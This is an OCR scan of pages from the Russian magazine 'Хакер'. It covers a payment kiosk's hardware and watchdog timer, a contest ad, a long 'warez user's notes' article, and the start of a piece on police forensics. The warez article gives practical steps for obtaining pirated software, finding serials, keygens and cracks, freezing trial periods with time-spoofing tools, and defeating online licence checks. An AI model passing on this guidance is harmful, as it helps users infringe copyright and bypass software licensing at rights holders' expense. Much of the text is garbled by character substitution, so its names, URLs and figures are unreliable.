Автомат оказался оченьтяжелым — его 
вес составляет85 кг! И это единственная 
защита от его физического переноса. 
Собственно, в состав системы входит 
всего 6 элементов: мониторная сборка, 
компьютерный отсек, купюроприемник, 
принтер, электромеханический замок 
включения/выключения питания и 
дополнительный монитор. 

Мониторная сборка является обяза- 
тельным элементом всех автоматов са- 
мообслуживания и предназначена для 
отображения информации и организа- 
ции функционального интерфейса. Она 
состоит из специального встраиваемого 
монитора и вандалостойкого сенсорного 
экрана. Иногда на авто мат уста на вли- 
вается дополнительный монитор. Рас- 
полагается он над основным и служит 
исключительно в рекламных целях. 
Компьютерный отсек представляет со- 
бой компьютерную часть автомата и узел 
объединения всехустройств в единую 
систему. В него входит ІВМ РС совмес- 
тимый компьютер, расположенный на 
специальном шасси. Конфигурируют 
терминалы наудивление мощными 
системами — это какминимум 2-ГГц 
процессоры. Но, судя поустановлен- 
ному на терминале ПО, вся эта мощь не 
используется на 100%. 

Купюроприемник предназначен для 
приема наличных денег при оплате то- 
варов или услуг. Он определяет номинал 
принимаемой купюры и проверяетее 
на предмет подделки. Купюроприем- 
никрассчитан на прием российских 
денег номиналом в 1 0, 50, 1 00, 500 и 



1000 рублей. Хранение принятых купюр 
осуществляется в специальном ящике 
— денежном стекере, который снимает- 
ся при инкассации автомата. Купю- 
роприемникоткрывается с помощью 
специального ключа и подключается 
через компьютерный отсек. 

Принтер предназначен для печати 
информации на бланкахтермобумаги. 
Выдача информационных бланков осу- 
ществляется в специальный лоток, рас- 
положенный в передней части автомата. 
Термобумага для печати размещается 
в специальном рулоне, заправляемом 
через компьютерный отсек. 
6РР5/65М-модем сантенной использу- 
ется для организации обмена инфор- 
мацией между автоматом и удаленным 
компьютером потехнологии беспровод- 
ной связи ѲРП5 или Ѳ5М. Для работы 
модема в него устанавливается специ- 
альная 5ІМ-карта соответствующего 
оператора сотовой связи, предостав- 
ляющего услуги по передаче данных в 
месте установки автомата. 
Электромеханический замок включе- 
ния/выключения питания служит для 
наружного включения/выключения 
автомата. Он может применяться какдля 
быстрого выполнения указанных опе- 
раций, так и для организации системы 
безопасности в качестве дополнитель- 
ного инструмента. Электрический запор 
нужен для открытия/закрытия автомата, 
а также для авторизации персоны для 
доступа кадминистративным функциям 
автомата. Прописывание в системе 
ключей происходит через администра- 
тивный интерфейс автомата. 




ТЕХНИЧЕСКИЕ ДАННЫЕ 
Железо: 

• процессор Іпіеі Сеіегоп 310 (2130 МНг, 533 МНг Р5В) 256 Кб 
ВОХ ѵѵ/сооіег (Эоскеі 478); 

• материнская плата ЕС5 Р4М800-М (ѴІА Р4М800) 5ѴѲА, 
ЭоипсІ, І_АІ\І, 3 РСІ, 2 ООП 3200, тАТХ (Пеіаіі); 

• модуль памяти ООП ЭйРАМ 256 МЬ РС-3200 Нупіх-1 
Огідіпаі; 

• контроллер ЭТ-ЬаЬ 1-152 РСІ 2 рогі ^азі зегіаі + 1 рогі ЕРР 
сотбо (Реіаіі); 

• блок питания ІпѴѴіп 300ѴѴ АТХ (Р4); 

• накопитель ЬЮО ѴѴезіегп Оідііаі 40 ѲЬ Ѵ\Ю400ВВ 7200грт 2 МЬ; 

• дополнительная видеокарта М5І РХ 250. 

Экран: 

• вандалостойкий сенсорный монитор ТРТ 17" Ь6 Ы7505, 
либо АСЕР АП 7*1 6 Аз. 

Шкура: 

• основа — корпус терминала самообслуживания Есо; 

• блок питания (250 Вт); 

• источник бесперебойного питания Роѵѵегтап ВаскРго 600; 

• активные колонки МісгоІаЬ В55 115В, плоские, белые; 

• замок высокой степени защиты АЫоу; 

• замок для наружного включения/выключения питания; 

• электрический запор; 

• коннектор для электрического запора; 

• сирена сигнализации. 

Девайсы: 

• купюроприемник СазЬСосІе 5М (стекер на 1500 купюр); 

• встроенный термопринтер (Рри 700, либо ЕР50ІЧ 422). 

СВЯЗЬ: 

• беспроводной 8РР5/Ѳ5М-модем Эіетепз МС-35І (рабочий 
стандарт 65М 900/1800); 

• антенна 65М. 



/031 



ХАКЕР 04 /100/ 07 








^ ІП2ІСІѲ 




(3) Кнопки для проведения 
тестирования печати 



(1 ) Купюроукладочный 
механизм 



(4) Крепление датчика 
окончания бумаги 



^^Программная начинка 

Клиент-серверные приложения, а также ядро 
системы каждая организация разрабатывает са- 
мостоятельно. На данный момент не существует 
унифицированной системы осуществления пла- 
тежей. Ось, под которую пишется все ПО, также 
выбирается организацией. Большинство фирм, 
как ни странно, работает на ѴѴІпбоѵѵБ-системах. 



Именно из-за этого и возникаетбольшинство 
сбоев в работе терминалов. Единицы предпри- 
ятий выбираютв качестве операционки *піх- 
системы. Клиентская часть приложения делится 
на ѵѵеЬ-модуль, в основном разрабатываемый 
на РНР, и модульоперационной системы, на- 
писанный на СРР, ОеІрЬі. ѴѴеЬ-модуль отвечает 
за транзакции и связьссервером.аѴѴІп-модуль 



— за обработку входящих данных на сторонетер- 
м и нала. Но терминалы не единственный способ 
взаимодействия с сервером. Клиент-серверное 
приложение (или агентское, какего называют) 
можноустанавливатьи на КПК, коммуникато- 
рах и сотовыхтелефонах. Это ПО в основном 
разрабатывается на ^ѵа и способно полноценно 
взаимодействовать с сервером. 




Безопасность 

Безопасностьаппарата обеспечивают нетоль- 
ко его бронированная шкура и солидный вес, 
но одно интересноеустройство. Этот девайс 
называется сторожевой таймер (ѴѴасЬБод) 
и располагается в компьютерном отсеке. Он 
предназначен для контроля состояния компью- 
тера, формирования сигнала на его перезапуск, 
сбора данных о состоянии датчиков, комму- 
тации силовой нагрузки. Сторожевой таймер 
выполняет следующие функции: 

• перезагрузка компьютера в случае длитель- 
ного отсутствия сигнала от компьютера; 

перезагрузка модема в случае длительного 
отсутствия сигнала от модема; 

включение сигнализации при открытии 
двери; 

• включение сигнализации при ударе; 
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• контрольлинии сети 220 В; 

• контрольлинии сети 12 В; 

• режим включения/выключения автомата по 
расписанию; 

• авторизация электронных ключей; 

• контрольтемпературы внешней среды. 
Настройка сторожевого таймера осуществляет- 
ся изадминистративного интерфейса програм- 
много обеспечения автомата. В зависимости 
от модели сторожевого таймера и програм- 
много обеспечения сервера это устройство 
может контролировать даже уровень наклона 
аппарата, поэтому в случае попытки его уронить 
устройство немедленно пошлеттревожный 
сигнал на сервер, либо отправитвглз на сото- 
вый телефон ответственных лиц. 

В дежурном режиме таймер от компьютера по 
каналу связи 115В получает (передает) данные 



отребуемом состоянии портов коммутации 
силовых нагрузок (данные о текущем состоя- 
нии портов) не менее одного раза в секунду. 
В случае задержки данных от компьютера на 
2 секунды таймер формирует сигнал иници- 
ализации контроллеру 115В РТ245ВМ. Если в 
течение 7 минут сеанс связи не восстановит- 
ся, он замыкает цепь РЕВЕТ на одну секунду. 
Сторожевой контроллер ждет завершения 
перезагрузки компьютера в течение 7 минут 
и повторяет цикл сначала. Цепи коммутации 
силовых нагрузок находятся в нормальном 
состоянии — питание включено. Текущее 
состояние цепей силовых нагрузок сохраня- 
ется в случае формирования сигнала РЕВЕТ 
по отсутствию сеанса связи с компьютером 
до поступления соответствующей команды от 
компьютера. □□ 
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(1 ) Прижимные ролики 



> Купюроукладчик 



(2) Оптические сенсоры 
проверки купюр 



> Компьютерный отсек* 
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(1 ) ОРВЗ-модем Зіеплепз 335і 



(5) Материнская плата 



КОМПАНИЯ КУБТ И ЖУРНАЛ «ХАКЕР» ОБЪЯВЛЯЮТ 
КОНКУРС. ЧТОБЫ ВЫИГРАТЬ КРУТЫЕ ПРИЗЫ, ТЕБЕ 
НУЖНО ПРАВИЛЬНО ОТВЕТИТЬ НАТРИ ВОПРОСА: 




ТіТгдеі 



ОТВЕТЫ ПРИСЫЛАЙ НА ТКУ5Т@КЕАІ..ХАКЕР.КЦ . 

ПРИЗЫ ДОСТАНУТСЯ ПЕРВЫМ ШЕСТЕРЫМ СЧАСТЛИВЦАМ! 



КОМПАНИЯ ТКІІ5Т -АВТОРИТЕТНЫЙ И ИЗВЕСТНЫЙ В ЕВРОПЕ 
ПРОИЗВОДИТЕЛЬ ЦИФРОВОЙ ТЕХНИКИ — ПРЕДЛАГАЕТ БОЛЕЕ 
200 РАЗНООБРАЗНЫХ ПРОДУКТОВ: МЫШИ, 

КЛАВИАТУРЫ, ѴѴЕВ-КАМЕРЫ, ФОТОКАМЕРЫ, (ХШ5І_ МОДЕМЫ, 
СЕТЕВЫЕ РОУТЕРЫ, АДАПТЕРЫ И МНОГОЕ ДРУГОЕ. 

В 2007 ГОДУ КОМПАНИЯ ТІШ5ТЯВЛЯЕТСЯ ОФИЦИАЛЬНЫМ 
СПОНСОРОМ КОМАНДЫ 5РѴКЕК ФОРМУЛЫ Р1. 



Кто является пилотом команды 
«Брукег» в чемпионате Р1 ? 



^ Что есть общего в ассортимен 
те продукции компании Тгизі 
и формулы Р 1 ? 



^ Какая страна является од- 
новременно родиной компании 
Тгизі и команды «Брукег» Р1 ? 



ГЛАВНЫЙ 

ПРИЗ: РОКСЕ 

РЕЕйВАСК 

5ТЕЕРШ6 

ѴѴНЕЕЮМ- 

3500Р 



5 ДОПОЛНИТЕЛЬНЫХ ПРИЗОВ: КОЛОНКИ 5.1 
зорроум зреакер зет зр-670от 
















ЗАПИСКИ 

ВАРЕЗНИКА 



СБОРНИК СОВЕТОВ ОТ БЫВАЛОГО ЛЮБИТЕЛЯ ВАРЕЗА 



Программное обеспечение в хИЗЗК всегда считалось общенациональным достоянием, 
и даже сейчас, когда хакеров приравнивают к террористам, а за нелегальное использо- 
вание ѴѴІпсІоѵѵз вполне можно загреметь в тюрьму, народ продолжает тянуть из сети ва- 
рез. Вопрос поставлен ребром — идет игра на выживание, и несколько хитрых трюков, 
позволяющих не подцепить заразу и найти именно то что нужно, совсем не помешают. 



□ Варезные залежи 

Добывать варез с каждым годом становится 
все труднее и труднее. На него приходится охо- 
титься как на животное, занесенное в Красную 
книгу. Найти что-нибудь на ѵѵеЬ'е практически 
нереально. Файлы выкладываются часто и пом- 
ногу, но спустя короткое время (иногда измеря- 
емое часами) прибиваются администраторами 
серверов, и поисковики выдаютбесконечные 
кладбища мертвых ссылок, мешающих искать 
еще действующие линки. Что касается музыки 
и фильмов, то здесь нас постоянно перебрасы- 
вают на платные серверы. И хотя плата обычно 
чисто символическая, недостаточное развитие 



платежных систем создаетогромныетрудности 
даже тем, кто хочет честно заплатить. Некоторые 
узлы принимают платежи с сотовыхтелефонов 
путем простой отсылки бітів, но и тут не всетак 
гладко. Нет никакой гарантии, что, отдав им 
денежки, ты получишьто что хотел, и вообще 
хоть что-то получишь. Количество жульничес- 
ких магазинов весьма велико и продолжает 
расти. Поэтому перед использованием сервиса 
неплохо бы поискать отзывы и рекомендации 
— вполне возможно, что он давно занесен в 
черные списки. 

В настоящих момент естьтри перспективных 
источника вареза: Осел/Битторрент (то есть 



пиринговые сети), приватные ^р-серверы и бес- 
платные файлохранилища (типа гарісІвЬаге.сопп). 
И у каждого из них есть свои нюансы. 

О Осел и как с ним дружить 

Ослом (не путать с ІЕ) называют популярный 
клиент файлообменной сети ейопкеу, который 
всегда можно скачать с ѵѵѵѵѵѵ.етц[е-рго]есЕ 
пеЕ Если коротко, то принцип работы сети 
заключаются в следующем: участники обмена 
ставят на свои компьютеры программы-клиенты 
и указывают папку, в которой лежат общедоступ- 
ные файлы. Остальныеучастники могут искать 
эти файлы по их названию (именно названию, 
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> Лучший способ скачать файл с гарібзЬаге.сопп и ему подобных 
— воспользоваться ІІпіѵегзаІЗЬаге Ооѵѵпіоасіег 




> Осел за работой 



но не содержимому!). Скачка файла производится сразу со всехузлов, 
на которых он только есть и которые вданный момент подключены ксети 
(то есть находятся в интернете с запущенным Ослом или каким-нибудь 
другим клиентом). Поскольку желающих скачать намного больше, чем 
желающих отдать, образуется внушительная очередь, продвигающаяся 
вперед с поистине черепашьей скоростью. Некоторые файлы скачива- 
ются месяцами поскольку узлы, на которых они лежат, появляются в сети 
лишь на короткое время. Поэтому Осел выгоден только при тарифах, оп- 
лачивающих лишь входящихтрафик, но не время, вхолостую проводимое 
в очередях. При этом он генерирует внушительный исходящийтрафик, и 
хотя существует масса нечестных модов (то есть модификаций ориги- 
нального клиента), сводящих его на нет, прибегать к ним стоиттолько по 
большой нужде, поскольку, если ими начнут пользоваться все, Осел умрет! 
Подробный мануал отом, какс Ослом совладать (а это совсем несложно), 
ты найдешь в статье «Качай — не перекачай» ( ѵѵѵѵѵѵ.хакер.ги/тадагіпе/ 
ха/08 1 /038/ 1 .азр ). А пока разберемся с одним важным нюансом. 

□ Криптография на пеньке 

Вытаскивая файл из Осла, никогда не знаешь, что в нем окажется. Можно 
несколько недель тащить заархивированный сборник всех альбомом 
любимой группы, который окажется... дешевым порнофильмом или 
вообще бесполезным хламом, набранным до кучи. Какой только урод вы- 
кладываеттакие файлы?! И главное, для чего?! Ну, некоторые — просто из 
вредности. Другие — по спецзаказу от правообладателей оригинального 
контента — засоряя Осла подобными левыми файлами, они существенно 
затрудняют поиск нормального, доброкачественного вареза. Поэтому, 
прежде чем поставить на закачку тяжеловесный файл, всегда обращай 
внимание на комментарии пользователей, а также на его имя. Если файл 
с одной и той же контрольной суммой у разных пользователей называется 
по-разному, то, естественно, вероятность получить фальшивку очень 
сильно возрастает. 

Крометого, достаточно часто встречаются зашифрованные архивы. 
Многие пользователи стирают их сразуже после скачки, матерясь всеми 
словам, которыетолько знают, а зря! Будем исходить изтого, что владелец 
файла выложил его в Осла не просто так, а с благородными намерениями, 
заключающимися в распространении (чаще всего дела обстоятименно 
так), а не в надувательстве пользователей. Значит, у каждого скачав- 
шего файл имеется возможность его расшифровать. Но как? Перебор 
по словарю не предлагать. В подавляющем большинстве случаев он 
ничего недает. И хотя универсальных решений нет, как правило, задачка 
решается очень просто. Просматривая содержимое архива, проверь, нет 
литам имени файла, похожего на имя ѵѵеЬ-узла? Если есть, то, набрав его 



в Еігеіюх или Опере, можно выйти на страничку, содержащую искомый 
пароль. Также в качестве пароля может фигурировать само имя файла. 
Допустим, мы видим: зирег-рирег-ѵѵагег-дгоир.пФ. Пытаемся использо- 
вать «вирег-рирег», а если не сработает, то«5ирег-рирег-ѵѵаге2-дгоир». 
Некоторые файлы архива могутбыть незашифрованы и содержать имя 
странички с паролем или сам пароль. Это могутбыть и текстовые, и Нт!-, 
и даже дТ/ірд-форматы! 

Файл зашифровывается, естественно, не из вредности, а для защиты от 
борцов за авторские права, которые обычно не настолько сообразительны 
и продвинуты, чтобы распознать подвох. Какбы там ни было, шифровка 
ослепляет 1 00% автоматических поисковых роботов, так что количество 
зашифрованных файлов в Осле, по-видимому, будеттолько расти. 

□ Все прелести ВіІТоггепІ 

Файлообменная сеть ейопкеу изначально проектировалась в расчете 
на умеренную загрузку, и с ростом ее популярности у пользователей 
появилисьогромные проблемы. Неоптимальное распределение нагрузки 
привело к неоправданному падению скорости и росту длины очередей. 
Другая файлообменная сеть ВііТоггепі, разработанная программистом по 
имени Вгагш Собеп, намного более прогрессивна в этом смысле и хорошо 
справляется с передачей огромных файлов, втом числе и образов ОѴО. 
Так, например, сидя на двухмегабитном канале, я редко видел в Осле ско- 
рость выше 69 Кб/сек (и это при том, что на скачке стояли десятки файлов 
и общая скорость скачки суммировалась), втоже время в ВііТоиепБе 150- 
180 Кб/сек — вполне нормальное явление. 

Но радоваться рано. Во-первых, если в Осле есть практически все (софт, 
фильмы, музыка, книги), то ВііТоггепІ предлагает весьма скромный 
ассортименте стиле «ешьто, что дают». Во-вторых, поиск в ВііТоггепі'е 
отсутствует вообще кактаковой, и чтобы начать качать, надо раздобыть 
специальный ВііТоггепі-файл. А где его раздобыть? Приходится идти на 
ѵѵеЬ или лезть в Осла. Существует множество серверов, содержащих сами 
ВііТоггепі-файлы или ссылки на них (они легко находятся в боодіе). Но, 
в отличие от Осла, в которого что попало, то пропало, то есть стало совер- 
шенно не подвластно правообладателю, ВііТоггепі-файлы сѵѵеЬ-серве- 
ровубираются по первомутребованию его, что чрезвычайно затрудняет 
поиски вареза. И хотя уже появилась специализированная поисковая 
ВііТоггепі-машина ( ЬирУ/веагсИ.ЫиоггепЕсот ). ее возможности пока 
сильно ограничены. 

Какбы там ни было, попробовать за юзать ВііТоггепІ все-таки стоит. 

Для этого понадобится любой подходящий клиент, например Збагеага, 
которую можно бесплатно скачать с ѵѵѵѵѵѵ.зЬагеага.сот . А пока она будет 
качаться, почитай бад по работе с ВііТоггепІ — ѵѵѵѵѵѵ.сІеззепЕпеі/Ь^ад . 
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□ Наша цель — приватные Нр-серверы 

Многие люди, собрав большое количество варе- 
за, воздвигаютсвои собственные (так называ- 
емые «приватные») Йр-серверы, раздающие 
варез либо в пределах локальной сети, либо 
через весь интернет. Это настоящий Клондайк, 
на котором можно найти практически все что 
угодно, поскольку, в отличие от провайдера ѵѵеЬ- 
серверов, являющегося юридическим лицом, к 
физическому лицу с требованиями что-то убрать 
с сервера уже не подъедешь! Владелец сервера 
просто пошлет правообладателя вто место, че- 
рез которое он появился на свет. Теоретически 
правообладатель может обратиться к провай- 
деру, нототтолько пожмет плечами. Клиентему 
деньги платит? Платит! А какие файлы он там 
гоняет, провайдера не интересует и за это он 
не отвечает, главное, чтобы на его собственных 
узлах ничего нелегального не лежало! 

Минусы приватных Йр довольно обширны и 
вполне сопоставимы с их достоинствами. Пер- 
вая трудность на пути к скачке — добыча адреса 
сервера, и преодолеть ее не так-то просто. 
Большинство приватных Йр не имеет доменных 
имен, ограничиваясь ІР, и делает все, чтобы к 
ним не залезли поисковые роботы. ІР-адреса 
либо передаются персонально (изуствуста), 
либо публикуются на форумах, например на 
(огит.ги-ЬоагсІ.сот . 

Скорость приватных Йр обычно невелика, а 
график работы крайне непостоянен и варьиру- 
ется в самых широких пределах. Содержимое 
сервера может меняться без предупреждений, 
и достаточно часто возникает ситуация, когда 
файл удаляется в процессе его скачки. А что с 
этим «огрызком» делать?! 

Опять-таки глобального поиска (характерного 
для Осла) у приватных Йр нет и никогда не 
будет. Поэтому чтобы найти конкретный варез, 
нужно перебрать большое количество Йр без 
каких-либо гарантий успеха. Несмотря на это, 
популярность приватных Йр просто огромна и 
сопоставима с популярностью Осла. 

□ Правила пользования приватными Нр 

В чужой монастырь со своим уставом не ходят, а 
на чужой Йр (ктому же еще и приватный) — и по- 
давно. Прежде всего нужноуяснитьоднуочень 
важную вещь. «Нормальные» Йр воздвигаются 
на довольно мощных каналах и обслуживаются 
выделенными серверами. Домашние Йр очень 
часто устанавливаются на основной машине 
владельца, используя его и без того неширокий 
канал. А это значит, что главное правило эти- 
кета не создавать владельцу сервера больших 
неприятностей, в противном случае можно 
получить бан. 
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Баны ставятся какавтоматически сервером на 
основании заложенных владельцем политик, 
таки вручную самим владельцем. Причем бло- 
кироваться может как отдельный ІР.таки целая 
подсеть. Время бана (в зависимости оттяжести 
«преступления») варьируется от нескольких 
минут до «пожизненного срока». 

Теперьо правилах. Собственно говоря, единого 
свода правил нет, и различные владельцы 
приватныхйр по-разному относятся кпользова- 
телям, но... лучше все-таки не наглеть. Прежде 
всего, не нужно быть дятлом, то есть «долбить» 
сервер, настойчиво пытаясьустановить со- 
единение, если сервер не отзывается. Вполне 
вероятно, что владелец отключил его по тем или 
иным соображениям (например, ему на время 
понадобилась полная пропускная способность 
его канала для удовлетворения его собственных 
потребностей). Долбежка обычно наказывается 
автоматическим баном, который снимается 
через некоторое время, если до дятла наконец 
дойдет, что он дятел. 

Далее, закачка в несколько потоков. Это 
вообще полный мракдля владельца сервера! 
Чтобы пользователи не мешали нормальной 
работе, владелец приватного Йр обычноуста- 
навливаетограничение на отдачу в расчете на 
одно соединение. Естественно, если закачка 
идет в несколько потоков, суммарная скорость 



пропорционально возрастает и это ограничение 
удается обойти. А когда к серверу присасывают- 
ся сразу несколько «пиявок» столстыми канала- 
ми, качающими в несколько потоков, владельцу 
приватного Йр можеточень сильно поплохеть, и 
последствия ждать себя не заставят! Проблема 
в том, что многие файлокачалки по умолчанию 
настроены самым неоптимальным (сточки 
зрения приватныхйр-серверов) образом, и 
пользователь недоумевает, за что ему постоянно 
влепляют бан. Такчто, прежде чем качать, убе- 
дись, что количество потоков не превышаеттрех 
(а в идеале равно одному), качается не более 
двух-трех файлов за раз, а время задержки при 
повторной установке соединения составляет, по 
меньшей мере, секунд 30. 

□ Ох уж эта Рапида 

Ошеломляющая популярность сервиса 
ѵѵѵѵѵѵ. га рісів баге .сопл не позволяет пройти мимо 
него. Собственно говоря, он не одинок в своем 
роде, и подобных служб можно насчитать десят- 
ки. Идея проста — пользовательзакачивает на 
ѵѵеЬ-сервер файл, на котором он сохраняется 
некоторое время, в течение которого л инк 
раздается всем желающим. Получается что-то 
типа файлообменной сети, только... Правильно! 
Без возможности поиска. Сам РарісІБЬа ге не 
позволяет просматривать имеющиеся на нем 



Как заморозить триал 

Альтернативой серийному номеру становится заморозка триала, который предоставляют не 
только дешевые зйагеѵѵаге-программы, но и вполне респектабельные продукты, например, от той 
же компании Ішеі. 

Иногда после истечения испытательного срока помогает тривиальный снос программы с ее после- 
дующей переустановкой. Но в подавляющем большинстве случаев защитный механизм оставляет 
в укромном месте реестра (или файловой системы) специальную метку, содержащую дату первой 
установки или флаг истечения триала, и тогда никакие повторные установки не срабатывают! 
Если, конечно, не отформатировать жесткий диск со всем его содержимым. ..Нои здесь нас может 
ожидать разочарование. Некоторые (впрочем, достаточно немногие) программы содержат в себе 
жестко прописанную (Ьагсі-сосіесі) дату скачки с сервера и, даже попав на девственно чистую ось, 
отказывают в работе, а повторная скачка обламывается, поскольку программа привязывается к 
аппаратной конфигурации, передавая ее на сервер. 

Но как бы там ни было, чтобы определить срок окончания триала, программе требуется знать 
текущее время, а вот его-то как раз нетрудно подделать. Чтобы не переводить системные часы 
вручную (утомительно это, да и работать на таком компьютере практически невозможно) , хаке- 
ры придумали специальные утилиты, перехватывающие обращения к АРІ-функциям, которые 
возвращают текущее время, и подсовывающие липовые данные ломаемой программе персональ- 
но, не затрагивая всех остальных! 

Таких утилит очень много, взять хотя бы хорошо известный Тгіаі Ргеегег, который можно бесплат- 
но скачать с Ьир://5ІЩІ : гее.ги/тойи1е5/туйоѵт1оаЙ5/5Ьоѵ\/Ше.рІір?1іс1=546 . Но самым крутым 
«ломиком» был и остается знаменитый Наіі оі 7 і±іе МоигЦаіп Кіп§. Он может останавливать время 
для отдельно взятых системных процессов. Достаточно в списке Ргосезз ЗеІесШг выбрать интере- 
сующее приложение, указать требуемое время и занести в Ргозіюсі Ргосезз Ьізі:. Время можно оста- 
навливать полностью или частично, например, часы, минуты, секунды будут идти, но следующий 
день так и не наступит. 
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файлы (многие из которых ктомуже еще и зашифрованы раз- 
ными паролями), и чтобы начать качать, нам нужно получить 
линк. Акакего получить? Да какобычно — через форумы и 
всевозможные варезно-развлекательные сайты. Если нужен 
софт, идем на іогит.ги-ЬоагсІ.сот . Если захотелось музыки, 
фильмов — на ѵѵѵѵѵѵ.пппп.гц и ему подобные. 

Недостатки этой системы налицо: конкретный варез найти 
оченьтрудно, по форумам можно лазить месяцами — и все 
безрезультатно. Ктомуже линки довольно быстро становятся 
неактуальными, и файлы отправляются в загробный мир, 
откуда, как известно, не возвращаются. Наконец, самое 
неприятное обстоятельство — вопреки своему названию, 
РарісІЗЬаге является крайне медленным средством файло- 
вого обмена (для бесплатного скачивания), вынуждающим 
ждать значительное время, порой доходящее до нескольких 
часов и увеличивающееся с каждым скачанным файлом. 
Проблематягомотной закачки решается двумя способами. 
Во-первых, можно автоматизировать нудное ожидание 
момента, когда пора будет скачать следующий файл. Это 
возможно с помощью специального менеджера закачек 
ІІпіѵегзаІЗЬаге Ооѵѵпіоасіег ( ѵѵѵѵѵѵ.бітопіиг.ги/сІизсІ.рЬр ). 
которому достаточно скормить (скопипастить)те линки, кото- 
рые публикуются на сайтах, а дальше просто ждать... Другой 
по-настоящему быстрый способ закачать файлы (момен- 
тально и на скоростях в несколько мегабит/сек) — это купить 
Ргетіит-аккаунт, лишенный всяких ограничений. Проблема 
лишь втом, что приобретать такой аккаунт одному слишком 
накладно. Вот если найти народ и оплатить его впятером, то 
это совсем другое дело. Рекомендую! 

□ Серийные номера против кеудеп'ов 

За исключением небольшого количества бесплатных про- 
грамм, все остальныетребуют введения серийного номера 
либо при установке, либо втечение испытательного (или 
триального) срока, обычно составляющего 30 дней (иногда 
меньше, иногда больше). Некоторые программы, вместо се- 
рийного номера, используют ключевой файл, за которыйтакже 
надо платить, а платить, как известно, никогда не хочется. 
Начнем ссерийных номеров. Они бывают двух типов: жестко 
прошитые в программу и генерируемые на основе имени 
пользователя/названия компании, вводимых при регист- 
рации. В Сети существуюттысячи хакерских серверов, на 
которых можно найти серийные номера практически под все 
программы на свете (достаточно набрать в боодіе «имя про- 
граммы зегіаі»). Однако в большинстве своемтакие серверы 
служат рассадниками зловредных программ, проникающих 
через дырявого ІЕ или Еіге^ох. Поэтому если на них и ходить, 
то только через безопасные браузеры, такие какОрега или 
Еупх. Однако скачанный серийный номер очень часто не 
срабатывает. Возможно, хакер написал номер от балды, 



просто чтобы заманить посетителей ксебе на сайт; най- 
денный серийникможетбытьотдругой версии или вообще 
внесен в так называемый блэк-лист, то есть, попросту говоря, 
забанен. Такчто поиски подходящего серийного номера 
могутзатянуться. Генераторы серийных номеров (кеудеп’ы) 
намного практичнее. Они представляют собой исполняемые 
программы, «рассчитывающие» серийный номер для любого 
заданного имени, и снимают проблему блэк-листов. При 
этом они создаютугрозу вирусного заражения, поскольку под 
видом генератора тебе запросто могут впарить троянскую 
лошадь, начиненную динамитом. Запускать на своем основ- 
ном компьютере та кую штуку — это безумие, граничащее с 
самоубийством! Воспользуйся лучше машиной товарища, 
переписав сгенерированный номер на бумажку (шутка), или 
виртуальной машиной наподобие ѴМѴѴаге, ѴігіиаІРС или 
В0СН5. Об этом мы уже писали. 

Если и сгенерированный номер не срабатывает, то, 
возможно, программа проверяет его через Сеть! Логика 
разработчиков ясна: инет сейчас естьу подавляющего 
большинства пользователей ПК, так почему бы не отослать 
серийный номер на специальный сервер и не проверитьего 
на «вшивость»? Частьтаких хитроумных защит отсекается 
путем установки персонального брандмауэра (я использую 
ЗуОаіе Регзопаі ЕігеѵѵаЩ, однако этотфокус проходит не 
всегда и в последнее время со многими программами не 
срабатывает. Почему? Немного поковырявшись в машинном 
коде, мы понимаем, что программы используют в ызов АРІ - 
функции Іпіегпе1;0е1;Соппес1;есІ5і;а1;е(), возвращающей статус 
подключения к интернету. И если интернету нас имеется, а 
защищенная программа не может достучаться до сервера, 
она делаетлогический вывод, что ее замуровали за бранд- 
мауэром, и сбрасывает флаг регистрации. 

Еслиты не владеешьЗоШСЕ и незнаешь, как ста вить точки 
останова, то единственное, что остается, — воспользоваться 
кряком, то есть хакерской тулзой, модифицирующей лома- 
емую программутак, чтобы она сидела и не мяукала. Кстати 
говоря, некоторые приложения (например, ТНе ВаЛ) исполь- 
зуют ключевые файлы, заверенные цифровой подписью, 
которые не могут быть сгенерированы никаким генератором. 
Чтобы заставить их работать, приходится брать в руки скаль- 
пель и хирургическим путем удалять из защитного механиз- 
ма все лишнее. Этим опять-таки занимаются кряки. 
Недостаток кряков втом, что, будучи исполняемыми про- 
граммами, они могут содержать что угодно, и отделаться 
запуском на виртуальной машинетутуже не получится, пос- 
кольку, ломая программу, они способны внедрить в нее лю- 
бой зловредный код. Но даже если они этого и не сделают, у 
нас нет никаких гарантий, что взлом осуществлен корректно 
и программа после «трепанации черепа» не поедет крышей 
и не станет падать или зависать в самых разных местах.^с 
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>Если варез придет- 
ся еще поискать, то 
все необходимое для 
поиска уже закачано 
для тебя на диск. Не 
пропусти: подборка 
еМиІе- и ВііТоггепі- 
клиентов, ігіаі-фри- 
зеры и море полезной 
инфы. 
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Могит.ги-ЬоагсІ.сопп 

— замечательный 
форум о софте и не 
только; 
ѵѵѵѵѵѵ.ппт.ги 

— сборник ссылок на 
свежие лакомства в 
Сети с ежедневными 
обновлениями. 
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>Как ни крути, но 
ѵѵагег был, есть и бу- 
дет вне закона. Одно 
дело — скачать «ле- 
карство» для жиз- 
ненно необходимой 
программы. Сучетом 
суровой российской 
реальности, тебе это, 
скорее всего, про- 
стят. Но не вздумай 
сам распространять 
пиратский софт. 
Иначе рискуешь 
получить по голове, 
причем сильно. 
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ПОПАЛСЯ: 

ТВОЙ КОМПЬЮТЕР 
У НИХ В РУКАХ! 



ЧТО И ГДЕ БУДУТ ИСКАТЬ КОМПЕТЕНТНЫЕ ОРГАНЫ В ТВОЕМ КОМПЕ 






Казалось бы, ничего такого не сделал. Ну взломал десяток сайтов — что с того? А тут 
на тебе: приходят дяди из милиции, предъявляют ордер и забирают компьютер на экс- *г Ьі^ 

пертизу. Конечно, это не твой случай, но знать, что в такой ситуации будут делать люди 
в погонах с компьютером, наверняка, интересно и полезно. е (Ж» 
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> Вот с помощью такой штуки людям в погонах удается быть пре- > Набор для исследования жестких накопителей 

дельно аккуратными во время работы с файлами — ни один из них 
не будет изменен или поврежден 



□ Простые истины 

Начнем стого, что просто так никто ктебе не 
придет. Не за чем! Приходят обычно для того, 
чтобы найти недостающие доказательства, 
или вообще сразу для задержания. При этом 
часть доказательной базы и хотя бы какая-то 
уверенность в том, что расследуемое преступ- 
ление совершил именно ты, у ребят в погонах 
кэтому моменту уже есть. Короче говоря, если 
где-то засветился — готовься принимать 
гостей. Может быть, пронесет, но есть и шансы, 
что придется расхлебывать кашу, которую 
заварил. Хочу заметить, что расследованием 
прецедента (по крайней мере, серьезного пре- 
цедента) совсем не обязательно занимаются 
только наши правоохранительные органы. Это 
может быть и собственная служба безопаснос- 
ти пострадавшего предприятия, и нанятые ей 
специалисты по информационной безопас- 
ности, и спецслужбы заинтересованных стран. 
Поэтому, несмотря на кажущуюся безнака- 
занность всего содеянного в сети, спешутебя 
